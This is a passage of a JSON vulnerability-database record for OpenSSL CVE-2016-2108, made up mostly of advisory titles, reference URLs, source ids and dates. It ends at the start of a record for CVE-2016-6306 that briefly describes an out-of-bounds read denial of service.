"https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-695" }, { "title": "Citrix Security Bulletins: Citrix XenServer 7.2 Multiple Security Updates", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=b7259bee9307e075caf863b54947ad7b" }, { "title": "Citrix Security Bulletins: Citrix XenServer Multiple Security Updates", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=c11f24ab4065121676cfe8313127856c" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Symantec Security Advisories: SA123 : OpenSSL Vulnerabilities 3-May-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=5d65f6765e60e5fe9e6998a5bde1aadc" }, { "title": "Forcepoint Security Advisories: CVE-2016-2105, 2106, 2107, 2108, 2109, 2176 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=01fd01e3d154696ffabfde89f4142310" }, { "title": "Tenable Security Advisories: [R3] PVS 5.1.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-13" }, { "title": "Android Security Bulletins: Android Security Bulletin\u2014July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=25584b3d319ca9e7cb2fae9ec5dbf5e0" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Android Security Bulletins: Android Security Bulletin\u2014July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=fb0fe6abcf6343f263d1cf5da183946c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Tenable Security Advisories: [R7] LCE 4.8.1 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-18" }, { "title": "Vuls simulator for Deep Security", "trust": 0.1, "url": "https://github.com/kn0630/vulssimulator_ds " }, { "title": "satellite-host-cve\nWhat does code do\nWhat versions does it work on\nPrerequisites\nHow to run your code\nExample Output\nKnown issues", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " }, { "title": "OpenSSL-CVE-lib", "trust": 0.1, "url": "https://github.com/chnzzh/openssl-cve-lib " }, { "title": "https://github.com/samreleasenotes/SamsungReleaseNotes", "trust": 0.1, "url": "https://github.com/samreleasenotes/samsungreleasenotes " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/android-security-bulletin-features-two-patch-levels/119056/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2108" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "NVD", "id": "CVE-2016-2108" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "trust": 1.4, "url": "http://source.android.com/security/bulletin/2016-07-01.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl" }, { "trust": 1.4, "url": "http://support.citrix.com/article/ctx212736" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2017:0194" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-2073.html" }, { "trust": 1.1, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05164862" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht206903" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05149345" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/89752" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2016:1137" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00016.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00014.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/184605.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00018.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00010.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183457.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2959-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00036.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00013.html" }, { "trust": 1.1, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00019.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00055.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1035721" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3566" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00030.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00011.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00008.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183607.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00029.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa123" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html" }, { "trust": 1.1, "url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00067\u0026languageid=en-fr" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-18" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05386804" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03726en_us" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20160504-0001/" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2017:0193" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=f5da52e308a6aeea6d5f3df98c4da295d7e9cc27" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=3661bb4e7934668bd99ca777ea8b30eedfafa871" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2108" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu94844193/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu93163809/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2108" }, { "trust": 0.8, "url": "http://www.aratana.jp/security/detail.php?id=16" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.4, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.4, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1331402" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05149345" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05164862" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024078" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024319" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099464" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989046" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021361" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376" }, { "trust": 0.3, "url": "http://rhn.redhat.com/errata/rhsa-2016-1137.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988007" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009281" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983909" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984323" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984446" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984609" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985736" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986068" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986152" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987968" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988189" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976" }, { "trust": 0.3, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-007-cve-2016-2108-negative-zero" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007982" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.2, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-4000" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-3110" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3183" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110" }, { "trust": 0.2, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/kn0630/vulssimulator_ds" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2959-1/" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03756en_us" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2109" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2107" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2176" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2106" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-2055.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/6.4/index.html" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03765en_us" }, { "trust": 0.1, "url": "http://h20565.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-a00006123en_" }, { "trust": 0.1, "url": "https://helion.hpwsportal.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3710" }, { "trust": 0.1, "url": "http://docs.hpcloud.com/#helion/releasenotes215.html" }, { "trust": 0.1, "url": "http://docs.hpcloud.com/#helion/installation/upgrade2x_to_215.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4599" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4601" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4600" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1865" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4596" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4447" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1863" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4582" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4595" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1864" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9862" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4598" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1684" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4602" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206900" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4594" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2108" }, { "db": "BID", "id": "89752" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137206" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137353" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "NVD", "id": "CVE-2016-2108" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2108" }, { "db": "BID", "id": "89752" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137206" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137353" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "NVD", "id": "CVE-2016-2108" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-05-05T00:00:00", "db": "VULMON", "id": "CVE-2016-2108" }, { "date": "2016-05-03T00:00:00", "db": "BID", "id": "89752" }, { "date": "2016-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "date": "2017-06-05T18:18:00", "db": "PACKETSTORM", "id": "142803" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-05-04T14:53:10", "db": "PACKETSTORM", "id": "136912" }, { "date": "2016-10-12T20:28:07", "db": "PACKETSTORM", "id": "139115" }, { "date": "2016-05-09T14:05:44", "db": "PACKETSTORM", "id": "136937" }, { "date": "2017-07-26T17:44:00", "db": "PACKETSTORM", "id": "143513" }, { "date": "2016-05-26T14:44:00", "db": "PACKETSTORM", "id": "137206" }, { "date": "2016-10-18T13:58:46", "db": "PACKETSTORM", "id": "139167" }, { "date": "2016-06-08T13:16:00", "db": "PACKETSTORM", "id": "137353" }, { "date": "2016-07-19T19:45:20", "db": "PACKETSTORM", "id": "137958" }, { "date": "2016-10-12T23:44:55", "db": "PACKETSTORM", "id": "139116" }, { "date": "2016-05-05T01:59:04.230000", "db": "NVD", "id": "CVE-2016-2108" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2108" }, { "date": "2016-10-10T00:14:00", "db": "BID", "id": "89752" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "date": "2023-11-07T02:30:56.157000", "db": "NVD", "id": "CVE-2016-2108" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "89752" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of ASN.1 Implementation of arbitrary code execution vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002475" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "89752" } ], "trust": 0.3 } }
var-201609-0592
Vulnerability from variot
The certificate parser in OpenSSL before 1.0.1u and 1.0.2 before 1.0.2i might allow remote attackers to cause a denial of service (out-of-bounds read) via crafted certificate operations, related to s3_clnt.c and s3_srvr.c. Supplementary information : CWE Vulnerability type by CWE-125: Out-of-bounds Read ( Read out of bounds ) Has been identified. http://cwe.mitre.org/data/definitions/125.htmlService disruption through the manipulation of crafted certificates by third parties ( Read out of bounds ) There is a possibility of being put into a state. OpenSSL is prone to a local denial-of-service vulnerability. A local attacker can exploit this issue to cause a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
